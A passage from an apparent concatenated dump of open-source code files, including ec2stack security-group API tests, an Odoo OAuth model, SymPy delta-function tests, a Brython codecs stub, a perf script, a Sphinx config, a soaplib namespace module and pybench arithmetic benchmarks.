def test_invalid_security_group_authorize_security_group(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupEgress'
data['GroupName'] = 'invalid-security-group'
data['FromPort'] = '1000'
data['ToPort'] = '1024'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '0.0.0.0/24'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/'
'invalid_security_group_authorize_security_group.json'
)
get.return_value.status_code = 431
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.NotFound' in response.data
def test_create_security_group(self):
data = self.get_example_data()
data['Action'] = 'CreateSecurityGroup'
data['GroupName'] = 'securitygroupname'
data['GroupDescription'] = 'security group description'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_create_security_group.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'CreateSecurityGroupResponse' in response.data
def test_create_duplicate_security_group(self):
data = self.get_example_data()
data['Action'] = 'CreateSecurityGroup'
data['GroupName'] = 'securitygroupname'
data['GroupDescription'] = 'security group description'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/invalid_create_security_group_duplicate.json'
)
get.return_value.status_code = 431
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.Duplicate' in response.data
def test_delete_security_group_by_name(self):
data = self.get_example_data()
data['Action'] = 'DeleteSecurityGroup'
data['GroupName'] = 'securitygroupname'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_delete_security_group.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'DeleteSecurityGroupResponse' in response.data
def test_delete_security_group_by_id(self):
data = self.get_example_data()
data['Action'] = 'DeleteSecurityGroup'
data['GroupId'] = 'securitygroupname'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_delete_security_group.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'DeleteSecurityGroupResponse' in response.data
def test_invalid_delete_security_group(self):
data = self.get_example_data()
data['Action'] = 'DeleteSecurityGroup'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'MissingParameter' in response.data
def test_describe_security_groups(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'DescribeSecurityGroupsResponse' in response.data
def test_describe_security_group_by_id(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupId'] = '3b637c2e-b0a8-40ae-a7a3-2bef2871d36d'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'DescribeSecurityGroupsResponse' in response.data
assert '3b637c2e-b0a8-40ae-a7a3-2bef2871d36d' in response.data
def test_invalid_describe_security_group_by_id(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupId'] = 'invalid-security-group-id'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.NotFound' in response.data
def test_empty_response_describe_security_group_by_id(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupId'] = 'invalid-security-group-id'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/empty_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.NotFound' in response.data
def test_describe_security_group_by_name(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupName'] = 'test'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'DescribeSecurityGroupsResponse' in response.data
assert 'test' in response.data
def test_invalid_describe_security_group_by_name(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupName'] = 'invalid-name'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.NotFound' in response.data
def test_empty_response_describe_security_group_by_name(self):
data = self.get_example_data()
data['Action'] = 'DescribeSecurityGroups'
data['GroupName'] = 'invalid-name'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/empty_describe_security_groups.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidGroup.NotFound' in response.data
def test_revoke_security_group_ingress(self):
data = self.get_example_data()
data['Action'] = 'RevokeSecurityGroupIngress'
data['GroupId'] = '7ae5b92f-3a0d-4977-bc33-f1aaecee5776'
data['FromPort'] = '1000'
data['ToPort'] = '1024'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '192.168.0.0/24'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/revoke_security_group_ingress.json'
)
get.return_value.status_code = 200
describe_item_request = mock.Mock()
describe_item_request.return_value = json.loads(read_file(
'tests/data/revoke_security_group_search.json'
))
with mock.patch('requests.get', get):
with mock.patch(
'ec2stack.providers.cloudstack.describe_item_request',
describe_item_request
):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'RevokeSecurityGroupIngressResponse' in response.data
def test_revoke_security_group_egress(self):
data = self.get_example_data()
data['Action'] = 'RevokeSecurityGroupEgress'
data['GroupId'] = '7ae5b92f-3a0d-4977-bc33-f1aaecee5776'
data['FromPort'] = '-1'
data['ToPort'] = '-1'
data['IpProtocol'] = 'icmp'
data['CidrIp'] = '192.168.0.0/24'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/revoke_security_group_egress.json'
)
get.return_value.status_code = 200
describe_item_request = mock.Mock()
describe_item_request.return_value = json.loads(read_file(
'tests/data/revoke_security_group_search.json'
))
with mock.patch('requests.get', get):
with mock.patch(
'ec2stack.providers.cloudstack.describe_item_request',
describe_item_request
):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'RevokeSecurityGroupEgressResponse' in response.data
def test_invalid_revoke_security_group(self):
data = self.get_example_data()
data['Action'] = 'RevokeSecurityGroupEgress'
data['GroupId'] = '7ae5b92f-3a0d-4977-bc33-f1aaecee5776'
data['FromPort'] = '0'
data['ToPort'] = '0'
data['IpProtocol'] = 'invalid'
data['CidrIp'] = '192.168.0.0/24'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/revoke_security_group_egress.json'
)
get.return_value.status_code = 200
describe_item_request = mock.Mock()
describe_item_request.return_value = json.loads(read_file(
'tests/data/revoke_security_group_search.json'
))
with mock.patch('requests.get', get):
with mock.patch(
'ec2stack.providers.cloudstack.describe_item_request',
describe_item_request
):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidPermission.NotFound' in response.data
| apache-2.0 |
cgstudiomap/cgstudiomap | main/parts/odoo/addons/auth_oauth/auth_oauth.py | 321 | 1135 | from openerp.osv import osv, fields
class auth_oauth_provider(osv.osv):
"""Class defining the configuration values of an OAuth2 provider"""
_name = 'auth.oauth.provider'
_description = 'OAuth2 provider'
_order = 'name'
_columns = {
'name' : fields.char('Provider name', required=True), # Name of the OAuth2 entity, Google, LinkedIn, etc
'client_id' : fields.char('Client ID'), # Our identifier
'auth_endpoint' : fields.char('Authentication URL', required=True), # OAuth provider URL to authenticate users
'scope' : fields.char('Scope'), # OAUth user data desired to access
'validation_endpoint' : fields.char('Validation URL', required=True),# OAuth provider URL to validate tokens
'data_endpoint' : fields.char('Data URL'),
'enabled' : fields.boolean('Allowed'),
'css_class' : fields.char('CSS class'),
'body' : fields.char('Body', required=True),
'sequence' : fields.integer(),
}
_defaults = {
'enabled' : False,
'css_class' : "zocial",
}
| agpl-3.0 |
18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/functions/special/tests/test_delta_functions.py | 12 | 2849 | from sympy import (
adjoint, conjugate, DiracDelta, Heaviside, nan, oo, pi, sign, sqrt,
symbols, transpose, Symbol, Piecewise, I, S, Eq
)
from sympy.utilities.pytest import raises
from sympy.core.function import ArgumentIndexError
x, y = symbols('x y')
def test_DiracDelta():
assert DiracDelta(1) == 0
assert DiracDelta(5.1) == 0
assert DiracDelta(-pi) == 0
assert DiracDelta(5, 7) == 0
assert DiracDelta(nan) == nan
assert DiracDelta(0).func is DiracDelta
assert DiracDelta(x).func is DiracDelta
assert adjoint(DiracDelta(x)) == DiracDelta(x)
assert adjoint(DiracDelta(x - y)) == DiracDelta(x - y)
assert conjugate(DiracDelta(x)) == DiracDelta(x)
assert conjugate(DiracDelta(x - y)) == DiracDelta(x - y)
assert transpose(DiracDelta(x)) == DiracDelta(x)
assert transpose(DiracDelta(x - y)) == DiracDelta(x - y)
assert DiracDelta(x).diff(x) == DiracDelta(x, 1)
assert DiracDelta(x, 1).diff(x) == DiracDelta(x, 2)
assert DiracDelta(x).is_simple(x) is True
assert DiracDelta(3*x).is_simple(x) is True
assert DiracDelta(x**2).is_simple(x) is False
assert DiracDelta(sqrt(x)).is_simple(x) is False
assert DiracDelta(x).is_simple(y) is False
assert DiracDelta(x*y).simplify(x) == DiracDelta(x)/abs(y)
assert DiracDelta(x*y).simplify(y) == DiracDelta(y)/abs(x)
assert DiracDelta(x**2*y).simplify(x) == DiracDelta(x**2*y)
assert DiracDelta(y).simplify(x) == DiracDelta(y)
assert DiracDelta((x - 1)*(x - 2)*(x - 3)).simplify(x) == \
DiracDelta(x - 3)/2 + DiracDelta(x - 2) + DiracDelta(x - 1)/2
raises(ArgumentIndexError, lambda: DiracDelta(x).fdiff(2))
raises(ValueError, lambda: DiracDelta(x, -1))
def test_heaviside():
assert Heaviside(0) == 0.5
assert Heaviside(-5) == 0
assert Heaviside(1) == 1
assert Heaviside(nan) == nan
assert adjoint(Heaviside(x)) == Heaviside(x)
assert adjoint(Heaviside(x - y)) == Heaviside(x - y)
assert conjugate(Heaviside(x)) == Heaviside(x)
assert conjugate(Heaviside(x - y)) == Heaviside(x - y)
assert transpose(Heaviside(x)) == Heaviside(x)
assert transpose(Heaviside(x - y)) == Heaviside(x - y)
assert Heaviside(x).diff(x) == DiracDelta(x)
assert Heaviside(x + I).is_Function is True
assert Heaviside(I*x).is_Function is True
raises(ArgumentIndexError, lambda: Heaviside(x).fdiff(2))
raises(ValueError, lambda: Heaviside(I))
raises(ValueError, lambda: Heaviside(2 + 3*I))
def test_rewrite():
x, y = Symbol('x', real=True), Symbol('y')
assert Heaviside(x).rewrite(Piecewise) == \
Piecewise((1, x > 0), (S(1)/2, Eq(x, 0)), (0, True))
assert Heaviside(y).rewrite(Piecewise) == Heaviside(y)
assert Heaviside(x).rewrite(sign) == (sign(x)+1)/2
assert Heaviside(y).rewrite(sign) == Heaviside(y)
| mit |
2014cdag10/2014cdag10 | wsgi/static/Brython2.1.0-20140419-113919/Lib/_codecs.py | 107 | 3745 |
def ascii_decode(*args,**kw):
pass
def ascii_encode(*args,**kw):
pass
def charbuffer_encode(*args,**kw):
pass
def charmap_build(*args,**kw):
pass
def charmap_decode(*args,**kw):
pass
def charmap_encode(*args,**kw):
pass
def decode(*args,**kw):
"""decode(obj, [encoding[,errors]]) -> object
Decodes obj using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a ValueError. Other possible values are 'ignore' and 'replace'
as well as any other name registered with codecs.register_error that is
able to handle ValueErrors."""
pass
def encode(*args,**kw):
"""encode(obj, [encoding[,errors]]) -> object
Encodes obj using the codec registered for encoding. encoding defaults
to the default encoding. errors may be given to set a different error
handling scheme. Default is 'strict' meaning that encoding errors raise
a ValueError. Other possible values are 'ignore', 'replace' and
'xmlcharrefreplace' as well as any other name registered with
codecs.register_error that can handle ValueErrors."""
pass
def escape_decode(*args,**kw):
pass
def escape_encode(*args,**kw):
pass
def latin_1_decode(*args,**kw):
pass
def latin_1_encode(*args,**kw):
pass
def lookup(encoding):
"""lookup(encoding) -> CodecInfo
Looks up a codec tuple in the Python codec registry and returns
a CodecInfo object."""
print('_codecs lookup',encoding)
return encoding
def lookup_error(*args,**kw):
"""lookup_error(errors) -> handler
Return the error handler for the specified error handling name
or raise a LookupError, if no handler exists under this name."""
pass
def mbcs_decode(*args,**kw):
pass
def mbcs_encode(*args,**kw):
pass
def raw_unicode_escape_decode(*args,**kw):
pass
def raw_unicode_escape_encode(*args,**kw):
pass
def readbuffer_encode(*args,**kw):
pass
def register(*args,**kw):
"""register(search_function)
Register a codec search function. Search functions are expected to take
one argument, the encoding name in all lower case letters, and return
a tuple of functions (encoder, decoder, stream_reader, stream_writer)
(or a CodecInfo object)."""
pass
def register_error(*args,**kw):
"""register_error(errors, handler)
Register the specified error handler under the name
errors. handler must be a callable object, that
will be called with an exception instance containing
information about the location of the encoding/decoding
error and must return a (replacement, new position) tuple."""
pass
def unicode_escape_decode(*args,**kw):
pass
def unicode_escape_encode(*args,**kw):
pass
def unicode_internal_decode(*args,**kw):
pass
def unicode_internal_encode(*args,**kw):
pass
def utf_16_be_decode(*args,**kw):
pass
def utf_16_be_encode(*args,**kw):
pass
def utf_16_decode(*args,**kw):
pass
def utf_16_encode(*args,**kw):
pass
def utf_16_ex_decode(*args,**kw):
pass
def utf_16_le_decode(*args,**kw):
pass
def utf_16_le_encode(*args,**kw):
pass
def utf_32_be_decode(*args,**kw):
pass
def utf_32_be_encode(*args,**kw):
pass
def utf_32_decode(*args,**kw):
pass
def utf_32_encode(*args,**kw):
pass
def utf_32_ex_decode(*args,**kw):
pass
def utf_32_le_decode(*args,**kw):
pass
def utf_32_le_encode(*args,**kw):
pass
def utf_7_decode(*args,**kw):
pass
def utf_7_encode(*args,**kw):
pass
def utf_8_decode(*args,**kw):
pass
def utf_8_encode(*args,**kw):
pass
| gpl-2.0 |
kukrimate/A6000_KK_Kernel | tools/perf/python/twatch.py | 7370 | 1334 | #! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, watermark = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
| gpl-2.0 |
Denniskevin/blog | vendor/mockery/mockery/docs/conf.py | 468 | 8442 | # -*- coding: utf-8 -*-
#
# Mockery Docs documentation build configuration file, created by
# sphinx-quickstart on Mon Mar 3 14:04:26 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Mockery Docs'
copyright = u'2014, Pádraic Brady, Dave Marshall, Wouter, Graham Campbell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'MockeryDocsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index2', 'MockeryDocs.tex', u'Mockery Docs Documentation',
u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index2', 'mockerydocs', u'Mockery Docs Documentation',
[u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index2', 'MockeryDocs', u'Mockery Docs Documentation',
u'Pádraic Brady, Dave Marshall, Wouter, Graham Campbell', 'MockeryDocs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
#on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
print sphinx_rtd_theme.get_html_theme_path()
| mit |
Titulacion-Sistemas/PythonTitulacion-EV | Lib/site-packages/soaplib/__init__.py | 1 | 2559 |
#
# soaplib - Copyright (C) Soaplib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
# namespace map
ns_xsd = 'http://www.w3.org/2001/XMLSchema'
ns_xsi = 'http://www.w3.org/2001/XMLSchema-instance'
ns_plink = 'http://schemas.xmlsoap.org/ws/2003/05/partner-link/'
ns_soap = 'http://schemas.xmlsoap.org/wsdl/soap/'
ns_wsdl = 'http://schemas.xmlsoap.org/wsdl/'
ns_soap_enc = 'http://schemas.xmlsoap.org/soap/encoding/'
ns_soap_env = 'http://schemas.xmlsoap.org/soap/envelope/'
ns_soap12_env = 'http://www.w3.org/2003/05/soap-envelope/'
ns_soap12_enc = 'http://www.w3.org/2003/05/soap-encoding/'
ns_wsa = 'http://schemas.xmlsoap.org/ws/2003/03/addressing'
ns_xop = 'http://www.w3.org/2004/08/xop/include'
nsmap = {
'xs': ns_xsd,
'xsi': ns_xsi,
'plink': ns_plink,
'soap': ns_soap,
'wsdl': ns_wsdl,
'senc': ns_soap_enc,
'senv': ns_soap_env,
's12env': ns_soap12_env,
's12enc': ns_soap12_enc,
'wsa': ns_wsa,
'xop': ns_xop,
}
# prefix map
prefmap = dict([(b,a) for a,b in nsmap.items()])
const_prefmap = dict(prefmap)
const_nsmap = dict(nsmap)
_ns_counter = 0
def get_namespace_prefix(ns):
global _ns_counter
assert ns != "__main__"
assert ns != "soaplib.serializers.base"
assert (isinstance(ns, str) or isinstance(ns, unicode)), ns
if not (ns in prefmap):
pref = "s%d" % _ns_counter
while pref in nsmap:
_ns_counter += 1
pref = "s%d" % _ns_counter
prefmap[ns] = pref
nsmap[pref] = ns
_ns_counter += 1
else:
pref = prefmap[ns]
return pref
def set_namespace_prefix(ns, pref):
if pref in nsmap and nsmap[pref] != ns:
ns_old = nsmap[pref]
del prefmap[ns_old]
get_namespace_prefix(ns_old)
cpref = get_namespace_prefix(ns)
del nsmap[cpref]
prefmap[ns] = pref
nsmap[pref] = ns
| mit |
juanyaw/python | cpython/Tools/pybench/Arithmetic.py | 92 | 13565 | from pybench import Test
class SimpleIntegerArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleFloatArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2.1
b = 3.3332
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
def calibrate(self):
for i in range(self.rounds):
pass
class SimpleIntFloatArithmetic(Test):
version = 2.0
operations = 5 * (3 + 5 + 5 + 3 + 3 + 3)
rounds = 120000
def test(self):
for i in range(self.rounds):
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
c = c - a
c = b - c
c = a / b
c = b / a
c = c / b
c = a * b
c = b * a
c = c * b
c = a / b
c = b / a
c = c / b
a = 2
b = 3
c = 3.14159
c = a + b
c = b + c
c = c + a
c = a + b
c = b + c
c = c - a
c = a - b
c = b - c
